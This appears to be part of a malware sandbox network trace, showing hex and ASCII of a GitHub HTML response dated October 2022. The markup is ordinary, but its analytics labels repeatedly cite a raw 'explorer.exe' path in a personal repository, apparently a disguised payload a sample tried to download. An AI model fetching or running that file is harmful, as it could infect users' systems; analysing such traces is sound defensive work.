                                                                                                                Data Ascii: e packages </div> </a></li> <li> <a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center pb-lg-3" data-analytics-event="{&quot;category&quot;:&quot;Hea
                                                                                                                2022-10-13 11:08:11 UTC3902INData Raw: 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 70 62 2d 6c 67 2d 33 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69
                                                                                                                Data Ascii: "HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center pb-lg-3" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&quot;,&quot;action&quot;:&quot;cli
                                                                                                                2022-10-13 11:08:11 UTC3902INData Raw: 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 32 34 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 63 6f 64 65 73 70 61 63 65 73 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 20 6d 72 2d 33 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 33 2e 35 20 33 2e 37 35 43 33 2e 35 20 32 2e 37 38 34 20 34 2e 32 38 34 20 32 20 35 2e 32 35 20 32 68 31 33 2e 35 63 2e 39 36 36 20 30 20 31 2e 37 35 2e 37 38 34 20 31 2e 37
                                                                                                                Data Ascii: vg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path fill-rule="evenodd" d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.7
                                                                                                                2022-10-13 11:08:11 UTC3904INData Raw: 6c 6f 72 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 43 6f 70 69 6c 6f 74 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 2f 63 6f 70 69 6c 6f 74 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 32 34 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 63 6f 70 69 6c 6f 74 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 20 6d 72 2d 33 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 39 2e 37 35 20 31 34 61 2e 37 35 2e
                                                                                                                Data Ascii: lorer.exe;ref_cta:Copilot;&quot;}" href="/features/copilot"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.
                                                                                                                2022-10-13 11:08:11 UTC3905INData Raw: 34 34 20 30 63 2e 31 30 36 2e 31 37 37 2e 32 32 34 2e 33 34 37 2e 33 35 35 2e 35 30 38 2e 37 37 2e 39 34 38 20 31 2e 39 31 38 20 31 2e 34 39 32 20 33 2e 35 30 38 20 31 2e 34 39 32 20 31 2e 37 32 35 20 30 20 32 2e 39 38 39 2d 2e 33 35 39 20 33 2e 37 38 32 2d 31 2e 32 35 39 2e 30 35 2d 2e 30 35 37 2e 30 39 39 2d 2e 31 31 36 2e 31 34 35 2d 2e 31 37 37 6c 2e 30 33 38 2e 30 39 76 36 2e 36 36 39 61 31 37 2e 36 31 38 20 31 37 2e 36 31 38 20 30 20 30 31 2d 32 2e 30 37 33 2e 39 38 43 31 36 2e 34 30 35 20 31 39 2e 39 30 36 20 31 34 2e 33 31 34 20 32 30 2e 35 20 31 32 20 32 30 2e 35 63 2d 32 2e 33 31 34 20 30 2d 34 2e 34 30 35 2d 2e 35 39 34 2d 35 2e 39 32 37 2d 31 2e 31 39 37 41 31 37 2e 36 32 20 31 37 2e 36 32 20 30 20 30 31 34 20 31 38 2e 33 32 33 76 2d 36 2e 36
                                                                                                                Data Ascii: 44 0c.106.177.224.347.355.508.77.948 1.918 1.492 3.508 1.492 1.725 0 2.989-.359 3.782-1.259.05-.057.099-.116.145-.177l.038.09v6.669a17.618 17.618 0 01-2.073.98C16.405 19.906 14.314 20.5 12 20.5c-2.314 0-4.405-.594-5.927-1.197A17.62 17.62 0 014 18.323v-6.6
                                                                                                                2022-10-13 11:08:11 UTC3906INData Raw: 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 43 6f 64 65 20 72 65 76 69 65 77 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 2f 63 6f 64 65 2d 72 65 76 69 65 77 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 32 34 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 63 6f 64 65 2d 72 65 76 69 65 77 20 63 6f
                                                                                                                Data Ascii: :/testermanmag/myownre/raw/main/explorer.exe;ref_cta:Code review;&quot;}" href="/features/code-review"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review co
                                                                                                                2022-10-13 11:08:11 UTC3908INData Raw: 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 49 73 73 75 65 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 2f 69 73 73 75 65 73 22 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 32 34 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 69 73 73
                                                                                                                Data Ascii: &quot;:&quot;ref_page:/testermanmag/myownre/raw/main/explorer.exe;ref_cta:Issues;&quot;}" href="/features/issues"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-iss
                                                                                                                2022-10-13 11:08:11 UTC3909INData Raw: 20 31 2e 37 35 20 30 20 30 30 31 36 20 31 32 2e 32 35 76 2d 39 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 2e 32 35 20 31 48 31 2e 37 35 7a 4d 31 2e 35 20 32 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2d 2e 32 35 68 31 32 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 39 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2e 32 35 68 2d 36 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 35 33 2e 32 32 4c 34 2e 35 20 31 35 2e 34 34 76 2d 32 2e 31 39 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 2e 37 35 2d 2e 37 35 68 2d 32 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 76 2d 39 2e 35 7a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 32 32 2e 35 20 38 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d
                                                                                                                Data Ascii: 1.75 0 0016 12.25v-9.5A1.75 1.75 0 0014.25 1H1.75zM1.5 2.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v9.5a.25.25 0 01-.25.25h-6.5a.75.75 0 00-.53.22L4.5 15.44v-2.19a.75.75 0 00-.75-.75h-2a.25.25 0 01-.25-.25v-9.5z"></path><path d="M22.5 8.75a.25.25 0 00-
                                                                                                                2022-10-13 11:08:11 UTC3910INData Raw: 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 50 72 6f 64 75 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 44 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72
                                                                                                                Data Ascii: lative py-2 Link--secondary" target="_blank" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Product&quot;,&quot;action&quot;:&quot;click to go to Documentation&quot;,&quot;label&quot;:&quot;ref_page:/testermanmag/myownre/r
                                                                                                                2022-10-13 11:08:11 UTC3912INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 6b 69 6c 6c 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 22 3e 0a 20 20 20 20 20 20 47 69 74 48 75 62 20 53 6b 69 6c 6c 73 0a 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 6c 69 6e 6b 2d 65 78 74 65 72 6e 61 6c 20 48 65 61 64 65 72 4d 65 6e 75 2d 65 78 74 65 72 6e 61 6c 2d 69 63 6f 6e 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 22 3e 0a 20 20 20 20 3c
                                                                                                                Data Ascii: " href="https://skills.github.com/"> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <
                                                                                                                2022-10-13 11:08:11 UTC3913INData Raw: 34 32 37 2e 31 37 37 4c 31 33 2e 30 33 20 34 2e 30 33 20 39 2e 32 38 20 37 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 37 35 2d 33 2e 37 35 2d 31 2e 35 34 33 2d 31 2e 35 34 33 41 2e 32 35 2e 32 35 20 30 20 30 31 31 30 2e 36 30 34 20 31 7a 4d 33 2e 37 35 20 32 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 32 20 33 2e 37 35 76 38 2e 35 63 30 20 2e 39 36 36 2e 37 38 34 20 31 2e 37 35 20 31 2e 37 35 20 31 2e 37 35 68 38 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 20 31 32 2e 32 35 76 2d 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 2d 31 2e 35 20 30 76 33 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2e 32 35 68 2d 38 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 76 2d 38 2e 35 61
                                                                                                                Data Ascii: 427.177L13.03 4.03 9.28 7.78a.75.75 0 01-1.06-1.06l3.75-3.75-1.543-1.543A.25.25 0 0110.604 1zM3.75 2A1.75 1.75 0 002 3.75v8.5c0 .966.784 1.75 1.75 1.75h8.5A1.75 1.75 0 0014 12.25v-3.5a.75.75 0 00-1.5 0v3.5a.25.25 0 01-.25.25h-8.5a.25.25 0 01-.25-.25v-8.5a
                                                                                                                2022-10-13 11:08:11 UTC3914INData Raw: 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 68 34 20 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 6d 79 2d 31 22 3e 42 79 20 50 6c 61 6e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64
                                                                                                                Data Ascii: b-3"> <li class="h4 color-fg-default my-1">By Plan</li> <li> <a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;category&quot;:&quot;Header d
                                                                                                                2022-10-13 11:08:11 UTC3916INData Raw: 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 73 74 79 6c 65 2d 6e 6f 6e 65 20 66 35 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 20 70 62 2d 33 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 68 34 20 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 6d 79 2d 31 22 3e 42 79 20 53 6f 6c 75 74 69 6f 6e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f
                                                                                                                Data Ascii: </a></li> </ul> <ul class="list-style-none f5 border-bottom pb-3 mb-3"> <li class="h4 color-fg-default my-1">By Solution</li> <li> <a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline positio
                                                                                                                2022-10-13 11:08:11 UTC3917INData Raw: 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 53 6f 6c 75 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 44 65 76 4f 70 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77
                                                                                                                Data Ascii: -relative py-2 Link--secondary" target="_blank" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Solutions&quot;,&quot;action&quot;:&quot;click to go to DevOps&quot;,&quot;label&quot;:&quot;ref_page:/testermanmag/myownre/raw
                                                                                                                2022-10-13 11:08:11 UTC3918INData Raw: 74 74 70 73 3a 2f 2f 72 65 73 6f 75 72 63 65 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 64 65 76 6f 70 73 2f 66 75 6e 64 61 6d 65 6e 74 61 6c 73 2f 64 65 76 73 65 63 6f 70 73 2f 22 3e 0a 20 20 20 20 20 20 44 65 76 53 65 63 4f 70 73 0a 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 6c 69 6e 6b 2d 65 78 74 65 72 6e 61 6c 20 48 65 61 64 65 72 4d 65 6e 75 2d 65 78 74 65 72 6e 61 6c 2d 69 63 6f 6e 20 63 6f 6c
                                                                                                                Data Ascii: ttps://resources.github.com/devops/fundamentals/devsecops/"> DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon col
                                                                                                                2022-10-13 11:08:11 UTC3920INData Raw: 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 53 6f 6c 75 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 52 65 73 6f 75 72 63 65 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77
                                                                                                                Data Ascii: lative py-2 Link--secondary" target="_blank" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Solutions&quot;,&quot;action&quot;:&quot;click to go to Resources&quot;,&quot;label&quot;:&quot;ref_page:/testermanmag/myownre/raw
                                                                                                                2022-10-13 11:08:11 UTC3921INData Raw: 74 61 69 6c 73 2d 74 61 72 67 65 74 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 4f 70 65 6e 20 53 6f 75 72 63 65 0a 20 20 20 20 20 20 3c 73 76 67 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 48 65 61 64 65 72 4d 65 6e 75 2d 69 63 6f 6e 20 6d 6c 2d 31 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c
                                                                                                                Data Ascii: tails-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path fil
                                                                                                                2022-10-13 11:08:11 UTC3922INData Raw: 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 4f 70 65 6e 20 53 6f 75 72 63 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 54 68 65 20 52 65 61 64 4d 45 20 50 72 6f 6a 65 63 74 26 71 75 6f 74
                                                                                                                Data Ascii: ndensed d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Open Source&quot;,&quot;action&quot;:&quot;click to go to The ReadME Project&quot
                                                                                                                2022-10-13 11:08:11 UTC3924INData Raw: 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 54 72 65 6e 64 69 6e 67 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 74 72 65 6e 64 69 6e 67 22 3e 0a 20 20 20 20 20 20 54 72 65 6e 64 69 6e 67 0a 0a 20 20 20 20 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70
                                                                                                                Data Ascii: ;label&quot;:&quot;ref_page:/testermanmag/myownre/raw/main/explorer.exe;ref_cta:Trending;&quot;}" href="/trending"> Trending </a></li> <li> <a class="HeaderMenu-dropdown-link lh-condensed d-block no-underline position-relative p
                                                                                                                2022-10-13 11:08:11 UTC3925INData Raw: 3d 22 64 2d 6c 67 2d 66 6c 65 78 20 6d 69 6e 2d 77 69 64 74 68 2d 30 20 6d 62 2d 32 20 6d 62 2d 6c 67 2d 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 0a 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 73 65 61 72 63 68 20 66 6c 65 78 2d 61 75 74 6f 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 20 66 6c 65 78 2d 73 65 6c 66 2d 73 74 72 65 74 63 68 20 66 6c 65 78 2d 6d 64 2d 73 65 6c 66 2d 61 75 74 6f 20 6d 62 2d 33 20 6d 62 2d 6d 64 2d 30 20 6d 72 2d 30 20 6d 72 2d 6d 64 2d 33 20 73 63 6f 70 65 64 2d 73 65 61 72 63 68 20 73 69 74 65 2d 73 63 6f 70 65 64 2d 73 65 61 72 63 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 22 0a 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69
                                                                                                                Data Ascii: ="d-lg-flex min-width-0 mb-2 mb-lg-0"> <div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="positi
                                                                                                                2022-10-13 11:08:11 UTC3926INData Raw: 2d 63 6f 6e 74 72 6f 6c 73 3d 22 6a 75 6d 70 2d 74 6f 2d 72 65 73 75 6c 74 73 22 0a 20 20 20 20 20 20 20 20 20 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 65 61 72 63 68 22 0a 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 3d 22 2f 5f 67 72 61 70 68 71 6c 2f 47 65 74 53 75 67 67 65 73 74 65 64 4e 61 76 69 67 61 74 69 6f 6e 44 65 73 74 69 6e 61 74 69 6f 6e 73 22 0a 20 20 20 20 20 20 20 20 20 20 73 70 65 6c 6c 63 68 65 63 6b 3d 22 66 61 6c 73 65 22 0a 20 20 20 20 20 20 20 20 20 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 0a 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 3c 